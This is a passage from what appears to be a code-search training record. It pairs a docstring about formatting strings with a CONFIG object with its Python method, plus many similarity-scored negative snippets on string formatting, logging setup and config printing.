self._parents_of[child].add(parent)\r\n if child is not None:\r\n self._children_of[parent].add(child)", "def create_child(self):\n raise NotImplementedError" ]
[ "0.7265803", "0.6487871", "0.64664084", "0.62878114", "0.6264923", "0.6200054", "0.6032241", "0.59954774", "0.5990614", "0.59605205", "0.59455884", "0.59455884", "0.591581", "0.5893812", "0.5794489", "0.5790334", "0.57764447", "0.5702759", "0.56942874", "0.5688074", "0.56839925", "0.5677099", "0.56742185", "0.56387055", "0.56370103", "0.5616215", "0.5584076", "0.5555786", "0.554189", "0.5536735", "0.5528112", "0.5509025", "0.5483496", "0.5471256", "0.54701936", "0.5463738", "0.5460892", "0.5443621", "0.5435751", "0.54353863", "0.5430739", "0.5427337", "0.5426231", "0.5415624", "0.5411567", "0.5403052", "0.53992754", "0.5398497", "0.53968453", "0.5392047", "0.5378419", "0.5378419", "0.5378419", "0.5372865", "0.5371897", "0.53710186", "0.53705454", "0.536289", "0.53594065", "0.5357862", "0.53525734", "0.535149", "0.5349208", "0.53468907", "0.53453785", "0.5345103", "0.5327837", "0.5322222", "0.52984434", "0.52904236", "0.5269987", "0.5266196", "0.5259898", "0.5251966", "0.52503175", "0.52322435", "0.52259135", "0.52132106", "0.52124983", "0.5198372", "0.5181877", "0.51812893", "0.5177163", "0.5177163", "0.5177042", "0.5170631", "0.51674354", "0.51644677", "0.51641786", "0.51628", "0.51595175", "0.5153809", "0.5147145", "0.51467305", "0.51292574", "0.51279813", "0.512643", "0.51113874", "0.5101407", "0.5100179" ]
0.7865205
0
Format strings using the CONFIG object. This method uses Python's built-in `str.format()` method. All root properties in CONFIG are passed in as kwargs. The properties are lazily evaluated and recursively expanded.
def format(self, value, key=None, **kwargs): if not isinstance(value, str): return value # always format strings using the root so the full path is available if self.root: return self.root.format(value, key, **kwargs) variables = CONFIG_VARIABLE_PATTERN.findall(value) expanded = {} for variable in variables: if variable not in kwargs: try: root_key = variable.split(".")[0] root = self.root if self.root else self expanded[root_key] = self.format(getattr(root, root_key), variable, **kwargs) except AttributeError: raise MissingConfiguration(variable, key) expanded.update(**kwargs) return value.format(**expanded)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def recursively_update_config(config, string_formatting_dict):\n\n for k in _iterate_list_or_dict(config):\n v = config[k]\n if isinstance(v, dict) or isinstance(v, list):\n recursively_update_config(v, string_formatting_dict)\n else:\n if _key_in_string(v, string_formatting_dict):\n config[k] = v.format(**string_formatting_dict)", "def set_formatter_string(config: dict):\n formatter_str = \"%(levelname)s %(name)s\"\n\n if config.get(\"formatter\"):\n return config[\"formatter\"]\n\n if config.get(\"extended\"):\n formatter_str += \".%(funcName)s():\"\n\n if config.get(\"timestamp\"):\n formatter_str = \"%(asctime)s \" + formatter_str\n\n formatter_str += \" %(message)s\"\n\n return formatter_str", "def format_string(self, template):\n out_str = \"\"\n search_property_name = \"\"\n in_property = False\n for char in template:\n if (in_property):\n if (char == '%'):\n if (len(search_property_name) > 0):\n prop_value = \"\"\n try:\n prop_value = str(self.get_property(search_property_name))\n except KeyError:\n pass\n out_str += prop_value\n search_property_name = \"\"\n in_property = False\n else:\n search_property_name += char\n else:\n if (char == '%'):\n in_property = True\n else:\n out_str += char\n\n # Handle unterminated property names\n if (in_property):\n out_str += '%'\n out_str += search_property_name\n\n return out_str", "def cfg_to_prop_string(cfg, key_transform=lambda k: k, value_transform=lambda v: v, separator=\";\"):\n return separator.join([\"%s:%s\" % (key_transform(key), value_transform(value)) for key, value in iteritems(cfg)])", "def format(self, **kw):\n params = self.defaults.copy()\n params.update(kw)\n if self.filter:\n self.filter(self, params)\n msg = self.msg\n if self.key is not None:\n key = self.key.format(**params)\n msg = msg[key]\n return msg.format(**params)", "def format(*args, **kwargs):\n if args:\n print ', '.join([str(s) for s in args])\n if kwargs:\n sub_items = []\n for k, v in kwargs.items():\n sub_items.append('{}={}'.format(k, v))\n print ', '.join(sub_items)", "def dump_config(self, obj, level=-1):\n indent = u\" \"\n if level >= 0:\n self._nginx_config += f\"{level * indent}{{\\n\"\n if isinstance(obj, dict):\n for key, val in obj.items():\n if hasattr(val, u\"__iter__\") and not isinstance(val, str):\n self._nginx_config += f\"{(level + 1) * indent}{key}\\n\"\n self.dump_config(val, level + 1)\n else:\n self._nginx_config += f\"{(level + 1) * indent}\" \\\n f\"{key} {val};\\n\"\n else:\n for val in obj:\n self._nginx_config += f\"{(level + 1) * indent}{val};\\n\"\n if level >= 0:\n self._nginx_config += f\"{level * indent}}}\\n\"", "def __str__(self):\n return self.fmt.format(*self.args, **self.kwargs)", "def format_string(self, pat=None, pat_args={}):\n if pat is None:\n pat = self.parent.pat\n if pat_args == {}:\n pat_args = self.parent.pat_args\n return entry_format.output(self, pat, pat_args)", "def GetConfigAsString(self, config, enum_values, index):\n string = textwrap.dedent(\"\"\"\\\n [{index}] = {{\n .monitor = {monitor_name},\n .stack_level = 0x{address:02X},\n .input_mask = 0x{input_mask:03X},\n .v_balance_min = {balance_min_cutoff}f,\n .v_balance_thres = {balance_thres}f,\n .v_balance_hyst = {balance_hysteresis}f,\n .num_max_simult_bal = {max_simult_balance}L,\n .num_series_cells = {num_series_cells}L,\n .control = {{\n .under_volt_thres = {under_volt_thres}f,\n .over_volt_thres = {over_volt_thres}f,\n .reference_on = {reference_on},\n .discharge_permitted = {discharge_permitted},\n .rate = {rate_str},\n .cell_channels = 
{cell_ch_str},\n .aux_channels = {aux_ch_str},\n .stat_channels = {stat_ch_str},\n .discharge_timeout = {dcto_str},\n .self_test_mode = {self_test_str}}}}},\n \"\"\").format(\n index=index,\n monitor_name=enum_values['monitor'],\n rate_str=rate_helper.Name(config['rate']),\n cell_ch_str=cell_ch_helper.Name(config['cell_ch']),\n aux_ch_str=aux_ch_helper.Name(config['aux_ch']),\n stat_ch_str=stat_ch_helper.Name(config['stat_ch']),\n dcto_str=dcto_helper.Name(config['discharge_timeout']),\n self_test_str=self_test_helper.Name(config['self_test_mode']),\n **config)\n return string", "def format_yaml(template, config):\n formatted = template\n for k, v in config.items():\n formatted = formatted.replace('${%s}' % k, v)\n return formatted", "def _process_str(self, fmt, *args, **kwargs):\n log_str = fmt\n if len(args) > 0 or len(kwargs) > 0:\n log_str = fmt.format(*args, **kwargs)\n\n return log_str", "def print_formatted_values(**kwargs):\n string = ', '.join([f'{k}: {format_number(kwargs[k])}' for k in kwargs])\n print(string)", "def digest_config(obj, kwargs, local_args = {}):\n ### Assemble list of CONFIGs from all super classes\n classes_in_heirarchy = [obj.__class__]\n configs = []\n while len(classes_in_heirarchy) > 0:\n Class = classes_in_heirarchy.pop()\n classes_in_heirarchy += Class.__bases__\n if hasattr(Class, \"CONFIG\"):\n configs.append(Class.CONFIG) \n\n #Order matters a lot here, first dicts have higher priority\n all_dicts = [kwargs, filtered_locals(local_args), obj.__dict__]\n all_dicts += configs\n item_lists = reversed([d.items() for d in all_dicts])\n obj.__dict__ = dict(reduce(op.add, item_lists))", "def __str__(self):\n config_str = 'Configurations\\n'\n config_str += pprint.pformat(self.__dict__)\n return config_str", "def format(obj): # pylint: disable=W0622\n# print '>>', obj\n if hasattr(obj, 'format'):\n return obj.format()\n return \"%s\" % obj", "def format(self, *args, **kwargs) -> String:\n pass", "def format(self, *args, **kwargs):\n return self._format(args, kwargs)", "def format_string(self, pat=None, pat_args=None):\n if pat is None:\n pat = self.pat\n if pat_args is None:\n pat_args = self.pat_args\n return '\\n'.join(e.format_string(pat, pat_args) for e in self)", "def _format_bases_config(bases_config: BasesConfiguration) -> str:\n return \"_\".join([_format_run_on_base(r) for r in bases_config.run_on])", "def get_formatter(self, **kwargs):\n config = dict([\n (attr, getattr(self, attr))\n for attr in [\n \"include_sign\",\n \"group_with_commas\",\n \"num_decimal_places\",\n ]\n ])\n config.update(kwargs)\n return \"\".join([\n \"{\",\n config.get(\"field_name\", \"\"),\n \":\",\n \"+\" if config[\"include_sign\"] else \"\",\n \",\" if config[\"group_with_commas\"] else \"\",\n \".\", str(config[\"num_decimal_places\"]), \"f\",\n \"}\",\n ])", "def print_config(config, logger):\n for k, v in config.items():\n logger.info(\"{}:\\t{}\".format(k.ljust(15), v))", "def format(self, obj, indent=0):\r\n return pformat(obj, indent=indent, depth=self.depth)", "def format(self):\n groups = [g + \".\" for g in self.groups]\n params = [\";\" + p.format() for p in self.params]\n groups_name_params = \"\".join(groups) + self.name + \"\".join(params)\n return groups_name_params + \":\" + self.format_value() + CRLF", "def log_cfg(cfg: dict, logger: Logger, prefix: str = \"cfg\"):\n for k, v in cfg.items():\n if isinstance(v, dict):\n p = \".\".join([prefix, k])\n log_cfg(v, logger, prefix=p)\n else:\n p = \".\".join([prefix, k])\n logger.info(\"{:34s} : {}\".format(p, 
v))", "def get_config_string(params, units=None):\n compact_str_items = []\n # first make a list of compact strings for each parameter\n for k, v in params.items():\n unit = \"\"\n if isinstance(units, dict): #check if not None not enough, units could be mocked which causes errors\n unit = units.get(k, \"\")\n compact_str_items.append(k + \"=\" + str(v) + unit)\n # and finally join them\n compact_str = \", \".join(compact_str_items)\n return compact_str", "def context_formatter(\n full_context: dict,\n *,\n flask_context: dict,\n schema_context: dict,\n model_context: dict,\n):\n sections = [(\"Flask\", flask_context)]\n if schema_context: # pragma: no cover\n sections.append((\"Schemas\", schema_context))\n if model_context: # pragma: no cover\n sections.append((\"Models\", model_context))\n\n additional_context_keys = (\n full_context.keys()\n - flask_context.keys()\n - schema_context.keys()\n - model_context.keys()\n )\n additional_context = {\n key: full_context[key] for key in additional_context_keys\n }\n if additional_context:\n sections.append((\"Additional\", additional_context))\n return \"\\n\".join([format_section(*section) for section in sections])", "def __format__(self, format_spec):\n # Reject anything that isn't an s\n if format_spec[-1] != 's':\n raise ValueError('{} format specifier not understood for this object',\n format_spec[:-1])\n # Output in this example will be (<a>,<b>,<c>)\n raw = \"(\" + \",\".join([str(self.a), str(self.b), str(self.c)]) + \")\"\n # Honor the format language by using the inbuilt string format\n # Since we know the original format_spec ends in an 's'\n # we can take advantage of the str.format method with a\n # string argument we constructed above\n return \"{r:{f}}\".format( r=raw, f=format_spec )", "def formatargvalues(args, varargs, varkw, locals,\r\n formatarg=str,\r\n formatvarargs=lambda name: '*' + name,\r\n formatvarkw=lambda name: '**' + name,\r\n formatvalue=lambda value: '=' + repr(value),\r\n join=joinseq):\r\n def convert(name, locals=locals,\r\n formatarg=formatarg, formatvalue=formatvalue):\r\n return formatarg(name) + formatvalue(locals[name])\r\n specs = []\r\n for i in range(len(args)):\r\n specs.append(strseq(args[i], convert, join))\r\n if varargs:\r\n specs.append(formatvarargs(varargs) + formatvalue(locals[varargs]))\r\n if varkw:\r\n specs.append(formatvarkw(varkw) + formatvalue(locals[varkw]))\r\n return '(' + string.join(specs, ', ') + ')'", "def str(self):\n\n list_of_entries = ['{0} name={1}'.format(self.layer_type, self.name)]\n for key, value in sorted(self.config.items()):\n if isinstance(value, str) and re.search('=', value):\n # the value is a string that contains an '=' sign, so we need to\n # enclose it in double-quotes, otherwise we woudldn't be able to\n # parse from that output.\n if re.search('\"', value):\n print(\"Warning: config '{0}={1}' contains both double-quotes \"\n \"and equals sign; it will not be possible to parse it \"\n \"from the file.\".format(key, value), file=sys.stderr)\n list_of_entries.append('{0}=\"{1}\"'.format(key, value))\n else:\n list_of_entries.append('{0}={1}'.format(key, value))\n\n return ' '.join(list_of_entries)", "def _format(self):\n min_value = self.replacements.get(str(self.min), str(self.min))\n max_value = self.replacements.get(str(self.max), str(self.max))\n l_brace = '(' if min_value.find('inf') != -1 else '['\n r_brace = ')' if max_value.find('inf') != -1 else ']'\n\n return '{l_brace}{min_value}, {max_value}{r_brace}'.format(\n l_brace=l_brace, r_brace=r_brace,\n 
min_value=min_value, max_value=max_value)", "def generate_context_output(context, indent=0):\r\n # Generate output text for values\r\n values = H.unicode_string('')\r\n if not isinstance(context, dict):\r\n return values\r\n for variable in context.values():\r\n has_children = False\r\n property_text = ''\r\n # Set indentation\r\n for i in range(indent): property_text += '\\t'\r\n # Property with value\r\n if variable['value'] is not None:\r\n if variable['name']:\r\n property_text += '{name} = '\r\n property_text += '({type}) {value}\\n'\r\n # Property with children\r\n elif isinstance(variable['children'], dict) and variable['numchildren'] is not None:\r\n has_children = True\r\n if variable['name']:\r\n property_text += '{name} = '\r\n property_text += '{type}[{numchildren}]\\n'\r\n # Unknown property\r\n else:\r\n if variable['name']:\r\n property_text += '{name} = '\r\n property_text += '<{type}>\\n'\r\n\r\n # Remove newlines in value to prevent incorrect indentation\r\n value = ''\r\n if variable['value'] and len(variable['value']) > 0:\r\n value = variable['value'].replace(\"\\r\\n\", \"\\n\").replace(\"\\n\", \" \")\r\n\r\n # Format string and append to output\r\n values += H.unicode_string(property_text \\\r\n .format(value=value, type=variable['type'], name=variable['name'], numchildren=variable['numchildren']))\r\n\r\n # Append property children to output\r\n if has_children:\r\n # Get children for property (no need to convert, already unicode)\r\n values += generate_context_output(variable['children'], indent+1)\r\n # Use ellipsis to indicate that results have been truncated\r\n limited = False\r\n if isinstance(variable['numchildren'], int) or H.is_digit(variable['numchildren']):\r\n if int(variable['numchildren']) != len(variable['children']):\r\n limited = True\r\n elif len(variable['children']) > 0 and not variable['numchildren']:\r\n limited = True\r\n if limited:\r\n for i in range(indent+1): values += H.unicode_string('\\t')\r\n values += H.unicode_string('...\\n')\r\n return values", "def logging_template():\n template = (\n '[loggers]\\n'\n 'keys=root\\n'\n '\\n'\n '[handlers]\\n'\n 'keys=consoleHandler\\n'\n '\\n'\n '[formatters]\\n'\n 'keys=simpleFormatter\\n'\n '\\n'\n '[logger_root]\\n'\n 'level=DEBUG\\n'\n 'handlers=consoleHandler\\n'\n '\\n'\n '[handler_consoleHandler]\\n'\n 'class=StreamHandler\\n'\n 'level=DEBUG\\n'\n 'formatter=simpleFormatter\\n'\n 'args=(sys.stdout,)\\n'\n '\\n'\n '[formatter_simpleFormatter]\\n'\n 'format=%(asctime)s - %(name)s - %(levelname)s - %(message)s\\n'\n 'datefmt=\\n')\n return template", "def format_relabel_config(\n source_labels=(), action='', regex='', target_label='', replacement=''):\n return (\n ' - source_labels: [{0}]\\n'\n ' action: {1}\\n'\n ' regex: {2}\\n'\n ' target_label: {3}\\n'\n ' replacement: {4}'\n ).format(\n ', '.join(source_labels),\n action,\n regex,\n target_label,\n replacement,\n )", "def format_arguments(data: Dict) -> str:\n\n def prep(key: str, value: Any) -> str:\n if isinstance(value, str):\n value = f'''\"{value.replace('\"', \"'\")}\"'''\n if key == \"pattern\":\n value = f\"r{value}\"\n return f\"{key}={value}\"\n\n return \",\\n\".join([prep(key, value) for key, value in data.items()])", "def _write_config(template_string: str, destination: Path, **template_vars) -> None:\n rendered = template_string.format(**template_vars)\n destination.write_text(rendered)", "def pformat(obj, incr=\" \"):\n def sub_pformat(obj):\n txt = pformat(obj, incr=incr)\n return indent(txt, incr)\n # Try short version.\n 
short_len = 60\n maybe_short = pp.pformat(obj)\n if \"\\n\" not in maybe_short and len(maybe_short) <= short_len:\n return maybe_short\n\n if isinstance(obj, list):\n out = f\"[\\n\"\n for obj_i in obj:\n out += sub_pformat(obj_i) + \",\\n\"\n out += f\"]\"\n return out\n elif isinstance(obj, dict):\n out = f\"{{\\n\"\n for k_i, obj_i in obj.items():\n txt = sub_pformat(obj_i)\n out += f\"{incr}{repr(k_i)}: {txt.strip()},\\n\"\n out += f\"}}\"\n return out\n else:\n return indent(pp.pformat(obj), incr)", "def make_scale_config_entry(class_path, name, cmd_line_format=True, **kwargs):\n d = dict(**kwargs)\n # XXX: can't use 'class' as a kwarg in call to dict, so doing it this way...\n d['class'] = class_path\n if cmd_line_format:\n return \"'%s' \" % json.dumps({name: d}).replace('\"', r'\\\"')\n else:\n return json.dumps({name: d})", "def __format__(self, formatstr):\n if formatstr.strip() == '': # Defualt behaviour mirrors self.__str__()\n formatstr = '+.3f'\n\n string = \\\n \"{:\" + formatstr +\"} \" + \\\n \"{:\" + formatstr +\"}i \" + \\\n \"{:\" + formatstr +\"}j \" + \\\n \"{:\" + formatstr +\"}k\"\n return string.format(self.q[0], self.q[1], self.q[2], self.q[3])", "def format(\n self,\n format_string,\n module=None,\n param_dict=None,\n force_composite=False,\n attr_getter=None,\n ):\n if param_dict is None:\n param_dict = {}\n\n # if the processed format string is not in the cache then create it.\n if format_string not in self.block_cache:\n self.build_block(format_string)\n\n first_block = self.block_cache[format_string]\n\n def get_parameter(key):\n \"\"\"\n function that finds and returns the value for a placeholder.\n \"\"\"\n if key in param_dict:\n # was a supplied parameter\n param = param_dict.get(key)\n elif module and hasattr(module, key):\n param = getattr(module, key)\n if hasattr(param, \"__call__\"):\n # we don't allow module methods\n raise Exception()\n elif attr_getter:\n # get value from attr_getter function\n try:\n param = attr_getter(key)\n except: # noqa e722\n raise Exception()\n else:\n raise Exception()\n if isinstance(param, Composite):\n if param.text():\n param = param.copy()\n else:\n param = \"\"\n return param\n\n # render our processed format\n valid, output = first_block.render(get_parameter, module)\n\n # clean things up a little\n if isinstance(output, list):\n output = Composite(output)\n if not output:\n if force_composite:\n output = Composite()\n else:\n output = \"\"\n\n return output", "def format_field(self, value, spec):\n cache = Cache()\n if spec == \"co\":\n # if cache(re.match(\"(.*)co$\", spec)):\n value = co_join(value)\n spec = \"s\"\n # cache.output.group(1) + \"s\"\n elif cache(re.match(r\"^sub(\\d?)_?(.*)$\", spec)):\n depth = (1 if cache.output.group(1) == \"\" else\n int(cache.output.group(1)))\n value = \"\\n\".join([\n \"{0}{1} = {2}\".format(depth * \" \", key, val)\n for key, val in value.items()])\n if cache.output.group(2) != \"\":\n value = (\n depth * \"[\" + cache.output.group(2) + depth * \"]\" + \"\\n\" +\n value)\n spec = \"s\"\n return super(Format, self).format_field(value, spec)", "def basicConfig(**kwargs):\n # Add thread safety in case someone mistakenly calls\n # basicConfig() from multiple threads\n logging._acquireLock()\n try:\n if len(logging.root.handlers) == 0:\n handlers = kwargs.pop(\"handlers\", None)\n if handlers is None:\n if \"stream\" in kwargs and \"filename\" in kwargs:\n raise ValueError(\"'stream' and 'filename' should not be \"\n \"specified together\")\n else:\n if \"stream\" in kwargs or 
\"filename\" in kwargs:\n raise ValueError(\"'stream' or 'filename' should not be \"\n \"specified together with 'handlers'\")\n if handlers is None:\n filename = kwargs.pop(\"filename\", None)\n mode = kwargs.pop(\"filemode\", 'a')\n if filename:\n h = logging.FileHandler(filename, mode)\n else:\n stream = kwargs.pop(\"stream\", None)\n h = logging.StreamHandler(stream)\n handlers = [h]\n dfs = kwargs.pop(\"datefmt\", None)\n style = kwargs.pop(\"style\", '%')\n if style not in _STYLES:\n raise ValueError('Style must be one of: %s' % ','.join(\n _STYLES.keys()))\n fs = kwargs.pop(\"format\", BASIC_FORMAT)\n fmt = JsonFormatter(fs, dfs, style)\n for h in handlers:\n if h.formatter is None:\n h.setFormatter(fmt)\n logging.root.addHandler(h)\n level = kwargs.pop(\"level\", None)\n if level is not None:\n logging.root.setLevel(level)\n if kwargs:\n keys = ', '.join(kwargs.keys())\n raise ValueError('Unrecognised argument(s): %s' % keys)\n finally:\n logging._releaseLock()", "def _repr_kwargs(self):\n\n ret = \"\"\n if self.options.growth:\n ret += \", growth=True\"\n elif self.options.circular:\n ret += \", circular=True\"\n\n return ret", "def __makeFormatString(self):\n self.__formatString = \"\"\n for f in self.__columns:\n self.__formatString += \"%(\"+ f + \")-\" + str(self.__widths[f]) + \\\n \"s \"", "def __str__(self):\n return (\"{{'global_config' : {0._global}, \"\n \"'local_config' : {0._local}, \"\n \"'on_demand_config': {0._on_demand}, \"\n \"'recent_caller' : '{0._recent_caller}'}}\".format(self))", "def build_strings(self, config_dict):\n\n # print(config_dict)\n self.string_cond.update(config_dict)", "def _format_msg(self, format_str, *args):\n if not args:\n format_str = six.moves.urllib.parse.unquote(format_str)\n return \"{} - - [{}] {}\\n\".format(\n self.client_address[0],\n self.log_date_time_string(),\n format_str % args\n )", "def generate_help(\n config_cls: type[T], formatter: Callable | None = None, **kwargs: Any\n) -> str:\n if formatter is None:\n formatter = _format_help_dicts\n help_dicts = _generate_help_dicts(config_cls)\n\n return formatter(help_dicts, **kwargs)", "def format(self, valDict):\n return self._formatStr % valDict", "def format(self, *args: object, **kwargs: object) -> HTML:\n return HTML(FORMATTER.vformat(self.value, args, kwargs))", "def local_config(self):\n return f'''\n{self.interface}\n\n{self.peers}\n'''", "def show_config(config, args):\n pprint.pprint(config)", "def __str__(self):\n\n # can't use backslash in f-string\n newline = \"\\n\"\n\n options = self.options\n kwoptions = self.kwoptions\n\n # add background to options\n if self.background:\n options.append(\"show background rectangle\")\n kwoptions.update({\"background rectangle/.style\": f\"{{fill={self.background}}}\"})\n\n return rf\"\"\"\\begin{{tikzpicture}}{wrap(fmt_options(self.options, self.kwoptions))}\n{newline.join(define_colours(self._used_colours))}\n{newline.join(self.defines)}\n{newline.join(self._commands)}\n\\end{{tikzpicture}}\"\"\"", "def formatall(obj):\n result = \"\"\n if isinstance(obj, list):\n# i = 0\n for obj in obj:\n #printf(\">>> [%d] >>> \", i)\n result += format(obj)\n result += \"\\n\"\n# i += 1\n return result\n if isinstance(obj, dict):\n for key, value in obj.items():\n result += \"%-15s : \" % key\n result += format(value)\n result += \"\\n\"\n return result\n return format(obj)", "def string(self, string, values=None):\n if values:\n values = self.values(values)\n return string.format(*values)\n return string", "def _trans_format(self):\n 
config_dict = vars(self._config)\n for item, value in config_dict.items():\n if value == 'None':\n config_dict[item] = None\n elif isinstance(value, str) and is_number(value):\n if value.isdigit():\n value = int(value)\n else:\n value = float(value)\n config_dict[item] = value", "def __str__(self):\n if self.flaky:\n fmt = 'flaky | '\n else:\n fmt = ''\n fmt += '{2}: {0}'\n if self.variant:\n fmt += ' {1}'\n return fmt.format(*self)", "def call_str(pvs):\n s = \"'{}', '{}'\".format(pvs.get('place'), pvs.get('stat_var'))\n if pvs.get('measurement_method'):\n s += \", measurement_method='{}'\".format(\n pvs.get('measurement_method'))\n if pvs.get('observation_period'):\n s += \", observation_period='{}'\".format(\n pvs.get('observation_period'))\n if pvs.get('unit'):\n s += \", unit='{}'\".format(pvs.get('unit'))\n if pvs.get('scaling_factor'):\n s += \", scaling_factor={}\".format(pvs.get('scaling_factor'))\n return s", "def __str__():\n return str(_config)", "def _repr_kwargs(self):\n\n ret = \"\"\n if self.options.growth:\n ret += \", growth=True\"\n elif self.options.circular:\n ret += \", circular=True\"\n else:\n if not self.options.underflow:\n ret += \", underflow=False\"\n if not self.options.overflow:\n ret += \", overflow=False\"\n\n return ret", "def test_repr_config(self) -> None:\n self.assertEqual(\n repr(self.config), \"TMConfiguration('q2', TMTape('abcdefghij', '.', 2))\"\n )\n self.assertEqual(\n repr(self.config2),\n \"MTMConfiguration('q1', (TMTape('abcdefghij', '.', 2), \"\n + \"TMTape('klmnopq', '.', 5)))\",\n )", "def get_format_opts(cls, format_=\"value\", fields=[]):\n return \" -f {0} {1}\".format(format_, \" \".join([\"-c \" + it for it in fields]))", "def _formatted_string(self, message: str, dict_values: dict) -> str:\n formatted_values = self._format_values_in_map(dict_values)\n return message.format(**formatted_values)", "def test_nested_format_fields():\n '{0:>{1}}'.format(42, 24)\n '{0:{a[1]}} {a}'.format(1, a=[1, 2])\n '{:>{}}'.format(42, 24)\n '{0:>{1}}'.format(42)\n '{0:>{1}}'.format(42, 24, 54)\n ##Warn: W1303\n '{0:{a[1]}}'.format(1)\n ##Warn: W1306\n '{0:{a.x}}'.format(1, a=2)", "def trans_format(trans_key, **kwargs):\n translated: str = _(trans_key)\n return translated.format(**kwargs)", "def format_dict(dictionary, depth=0):\n tab = \" \" * 4\n string = \"{\\n\"\n for key, val in dictionary.items():\n string += depth * tab \n string += \"{}: \".format(key)\n if type(val) is dict:\n string += format_dict(val, depth + 1)\n \n else:\n if type(val) is str:\n fmt = \"'{}'\\n\"\n else:\n fmt = \"{}\\n\"\n string += fmt.format(val)\n string += (depth) * tab + '}\\n'\n return string", "def formatargspec(args, varargs=None, varkw=None, defaults=None,\r\n formatarg=str,\r\n formatvarargs=lambda name: '*' + name,\r\n formatvarkw=lambda name: '**' + name,\r\n formatvalue=lambda value: '=' + repr(value),\r\n join=joinseq):\r\n specs = []\r\n if defaults:\r\n firstdefault = len(args) - len(defaults)\r\n for i, arg in enumerate(args):\r\n spec = strseq(arg, formatarg, join)\r\n if defaults and i >= firstdefault:\r\n spec = spec + formatvalue(defaults[i - firstdefault])\r\n specs.append(spec)\r\n if varargs is not None:\r\n specs.append(formatvarargs(varargs))\r\n if varkw is not None:\r\n specs.append(formatvarkw(varkw))\r\n return '(' + string.join(specs, ', ') + ')'", "def format_parameter_value(self, param_config, precision):\n # type: (Dict[str, Any], int) -> str\n return \"\"", "def _format_obj(cls, **kwargs):\n def doc_rebuilder(obj):\n if 
kwargs.pop('_VOID_',False):\n return ''\n try:\n doc = getattr(obj,'__doc__')\n assert doc\n except:\n return ''\n else:\n return doc.format(**kwargs) # str(doc).format(**kwargs)\n return doc_rebuilder", "def repr_str(obj, attrs, update=None):\n props = [\n (attr, value)\n for attr, value in (\n (attr, getattr(obj, attr))\n for attr in attrs\n )\n if value is not None\n ]\n\n if update is not None:\n props = update(props)\n\n props_str = ', '.join('%s=%s' % (attr, value) for attr, value in props)\n return \"<{klass}: {props_str}>\".format(\n klass=obj.__class__.__name__,\n props_str=props_str,\n )", "def _format_msg(self, format_str, *args):\r\n return u\"{0} - - [{1}] {2}\\n\".format(\r\n self.client_address[0],\r\n self.log_date_time_string(),\r\n format_str % args\r\n )", "def format_property(name, value, annotations):\n\n annotation = annotations.get(name)\n type_str = annotation.__name__ if annotation else typing.Any\n return \"{} = ... # type: {}\".format(name, type_str)", "def write_config_string(input_dict, entry_char='>', attribution_char='=',\n usekeys=None):\n # Selects the desired entries of the input_dict\n if usekeys is not None:\n input_dict = {key: input_dict[key] for key in usekeys}\n\n result_str = \"\"\n\n for key, value in input_dict.items():\n result_str += entry_string(key, value, entry_char, attribution_char)\n\n return result_str", "def print_config(config):\n # pprint.pprint(config)\n headers = [u'name', u'flavor', u'ip-addresses', u'image-id']\n pt = prettytable.PrettyTable(headers)\n pt.align[\"name\"] = 'l'\n pt.align[\"flavor\"] = 'l' \n for s in config[\"servers\"]:\n server = config[\"servers\"][s]\n tds = []\n tds.append(s)\n tds.append(server['flavor'])\n # make a nice list of networks:\n nets = \"\"\n for ip in server['ip-addresses'].keys():\n nets = nets + \"%s: %s\\n\" % (ip, server['ip-addresses'][ip]) \n tds.append(nets)\n tds.append(server['image-id'])\n \n pt.add_row(tds)\n print pt.get_string()", "def resolve(text, *args, **kwargs):\n text = gettext(text)\n # Allways close formatting\n text += '{c.end}{c.default}'\n colors = NO_COLORS\n if not settings.opt('no_color'):\n colors = COLORS\n return text.format(*args, c=colors, **kwargs)", "def _format(self):\n output = f\"\\n{color('>>> DUMP')} from {self.filename}: {color(f'L{self.line}')} in {color(f'{self.method}()')}\"\n\n for name, obj in self.objects.items():\n output += f\"\\n\\n{color(f' - {name}:')}\\n\"\n output += f\" {pformat(obj, width=110, indent=4)}\"\n\n output += color(\"\\n\\n<<< END\")\n return output", "def _render_config(self, config, path):\n if self._check_for_custom_config(path):\n self._use_custom_config(path)\n return\n\n with open(self._get_tempdir() + '/' + path, 'w') as f:\n for section, settings in config.items():\n f.write('[' + section + ']\\n')\n for k, v in settings.items():\n r = str(v).lower() if isinstance(v, bool) else str(v)\n f.write(k + '=' + r + '\\n')\n f.write('\\n')", "def formatTargets(self, **kwargs):\n for key, val in kwargs.items():\n self.formatTarget(key, val)", "def __str__(self):\n return (\"\"\"\n{\n %s: {\n start_time: %s,\n stop_time: %s\n }\n}\"\"\" % (self._name, self._start_time, self._stop_time)\n )", "def show_config(args):\n args = args.__dict__\n\n log.warning('tomolog status start')\n for section, name in zip(SECTIONS, NICE_NAMES):\n entries = sorted((k for k in args.keys() if k.replace('_', '-') in SECTIONS[section]))\n if entries:\n for entry in entries:\n value = args[entry] if args[entry] != None else \"-\"\n log.info(\" {:<16} 
{}\".format(entry, value))\n\n log.warning('tomolog status end')", "def _format_dimensions(dimensions):\n if not dimensions:\n return \"\"\n\n dim_pairs = [\"%s=%s\" % (k, v) for k, v in dimensions.items()]\n return \"[%s]\" % (\",\".join(dim_pairs))", "def _config_str(config: Config) -> str:\n _C = config\n\n __C: CN = CN({\"RANDOM_SEED\": _C.random_seed})\n common_string: str = str(__C) + \"\\n\"\n\n return common_string", "def __repr__(self):\n string = ''\n for key, val in self.setting().items():\n string += '{}({})\\n'.format(key, val)\n return string", "def format(self,\n tree: Tree,\n indent: Union[int, None] = -1,\n compact: bool = False) -> str:\n if not isinstance(tree, Tree):\n tree = Tree(tree)\n vars = [var for var, _ in tree.nodes()] if compact else []\n parts = ['# ::{}{}'.format(key, ' ' + value if value else value)\n for key, value in tree.metadata.items()]\n parts.append(self._format_node(tree.node, indent, 0, set(vars)))\n return '\\n'.join(parts)", "def __str__(self):\n template = ('Bounds: minx={f}, miny={f}, minz={f}\\n '\n 'maxx={f}, maxy={f}, maxz={f}'.format(f=self._format))\n # Formatter must be recreated each time to reset value counter\n return NoneFormatter().format(template, *self)", "def __str__(self):\n return \"%s #config from: %s\" % (self._config, self._realpath)", "def format(self, *args,\n bullet: Union[str, bool] = None,\n style: StyleOptions = None,\n key_style: StyleOptions = None) -> str:\n if len(args) == 0:\n return \"\"\n\n if len(args) == 1:\n obj = args[0]\n elif len(args) == 2 and self.print_name_value_pairs:\n obj = {args[0]: args[1]}\n else:\n obj = args\n\n if bullet:\n bullet = self._normalize_bullet(bullet)\n if is_bullettable(obj):\n return self._format_aux(obj,\n bullet=bullet,\n style=style,\n key_style=key_style)\n elif self._bullet != 